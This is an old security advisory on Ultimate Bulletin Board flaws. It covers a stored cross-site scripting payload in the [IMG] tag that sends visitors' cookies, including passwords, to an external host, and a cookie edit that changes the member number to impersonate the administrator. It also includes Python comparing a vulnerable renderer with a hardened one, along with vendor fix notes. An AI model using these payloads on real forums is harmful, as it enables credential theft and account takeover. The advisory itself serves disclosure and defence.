COMMAND

    Ultimate Bulletin Board

SYSTEMS AFFECTED

    Ultimate Bulletin Board

PROBLEM

    Scott Ashman found the following.  If a user has info stored in a
    cookie, replies to a message and is using IE 4.0+, there is a way
    for a hacker to trap his IP / user name / password / other cookie
    information and send them to an external source using your UBB
    code with HTML *off*.  There is a way to do this by simply viewing
    a message as well, although it's obvious something is going on as
    it involves a redirection.  Here's how it works.

    Apparently the [img][/img] tag allows non-spaced javascript to
    run.  You can write a line like this:

        [IMG]test"onerror="alert('test');[/IMG]

    This will run the javascript alert when the image 'test' fails  to
    load.

    Your cookies can hold both the username and password, but they are
    only accessible on the http://sitename/cgi-bin/ path.  Script
    running on anything in the cgi path (replies) can access it.  So

        [IMG]test"onerror="alert(document.cookie);[/IMG]

    will pop up an alert box with the cookie info on a "reply" page as
    it's displayed in the thread review at the bottom.

    You can reassign the src of your image (this.src) with
    document.cookie tacked on to point to an external page.  The weird
    thing about imgs and http requests in general is that your
    destination does not have to be an image.  So

        <a src="www.excite.com/index.html">

    will actually try to access index.html.  Hence, you can add actual
    passable information to an external cgi or whatever.  On the
    external page all you need to do is either watch the logs or have
    the page itself log any URL variables along with the IPs coming in
    from the request.

    The final line should read something like:

        [IMG]test"onerror="this.src='http://xxx.xxx.com/page.cfm?'+escape(document.cookie);[/IMG]

    Pasting this line [no spaces/crlf] in a message means that any
    user replying to anything in that thread will cause their cookie
    to be sent to an external source.
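    To show where the rendering goes wrong and how a board should handle
    the [IMG] tag instead, here is an added example (not UBB's own Perl
    code; the tag body and URLs are constructed inputs).  The naive
    renderer reproduces the attribute break-out described above; the
    hardened one only accepts an absolute http/https URL made of plain URL
    characters and HTML-escapes it before it reaches the attribute.

```python
import html
import re

# Constructed sample inputs: the payload shape described above and a benign URL.
MALICIOUS = '[IMG]test"onerror="alert(document.cookie);[/IMG]'
BENIGN = '[IMG]http://example.com/pic.gif[/IMG]'

IMG_TAG = re.compile(r'\[IMG\](.*?)\[/IMG\]', re.IGNORECASE | re.DOTALL)


def render_img_naive(text: str) -> str:
    """Vulnerable: the tag body is dropped straight into a src attribute.

    A double quote in the body closes the attribute, so anything after it
    (e.g. onerror="...") becomes a live HTML attribute even with HTML 'off'.
    """
    return IMG_TAG.sub(lambda m: '<img src="%s">' % m.group(1), text)


# Allowlist: absolute http/https URL built only from unreserved/reserved URL
# characters. No quotes, angle brackets, whitespace or control characters.
SAFE_URL = re.compile(r"https?://[A-Za-z0-9\-._~:/?#\[\]@!$&'()*+,;=%]+")


def render_img_safe(text: str) -> str:
    """Hardened: validate the URL, then HTML-escape it inside the attribute.

    A body that fails validation is not rendered as a tag at all; it is
    emitted as escaped literal text so the reader sees it, harmlessly.
    """
    def repl(m: re.Match) -> str:
        url = m.group(1).strip()
        if not SAFE_URL.fullmatch(url):
            return html.escape(m.group(0), quote=True)
        # quote=True turns " and ' into entities, so the attribute cannot be closed.
        return '<img src="%s">' % html.escape(url, quote=True)
    return IMG_TAG.sub(repl, text)


if __name__ == "__main__":
    print(render_img_naive(MALICIOUS))
    print(render_img_safe(MALICIOUS))
    print(render_img_safe(BENIGN))
```

    The same allowlist-then-escape approach applies to [URL] and any other
    tag whose body lands in an attribute.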

    'AlphaVersion' found the same.  Anyway, Scott describes a way to
    retrieve other users' usernames and passwords by putting some
    javascript between the image tags in a message, however there is
    an easier and less noticeable way to achieve this.  After
    logging in 2 cookies are sent (cut from Netscape's cookies.txt
    file):

        host FALSE / FALSE 1013870132 login2451956.1435
        02-16-2001%2009%3A48%20AM&2451957.0948

        host FALSE / FALSE 1045406132 ubber2451956.1435
        alphaversion&<password>&AlphaVersion&45&00000036

    The second cookie consists of 5 parts: the username, the password,
    the name that will be displayed when you post, a number of which
    we are not sure what it means, and the member number, padded with
    0's.

    It seems that the only part that actually gets checked is the
    member number.  So if you send the same cookie, but with a
    different member number back (the member numbers can be found in
    the messages) you will be logged in as that member.  You can then
    post messages, edit messages and do whatever else that particular
    user can do on the board.  It seems member number 1 is the
    administrator, so if you edited Netscape's cookie file to make the
    cookie say this:

        host FALSE / FALSE 1045406132 ubber2451956.1435
        alphaversion&<password>&AlphaVersion&45&00000001

    you'd be able to edit and delete the messages from all users.  To
    make matters worse the board will replace the fake cookie with one
    that holds the info for the user whose member number you sent
    back.  This includes the password.

    This has been tested on Ultimate Bulletin Board 6.0, Beta 7.8.

SOLUTION

    This issue has been resolved in version 5.47e, currently available
    in the UBB Members Area at Infopop.com.

    As for what 'Alphaversion' found, Infopop did release a new beta
    version to fix this problem and have released other versions
    since, all containing the fix to this problem.  Their most current
    version of the Beta release is 8.1; the fix was in 7.9, the bug
    was in 7.8 (at the moment of writing).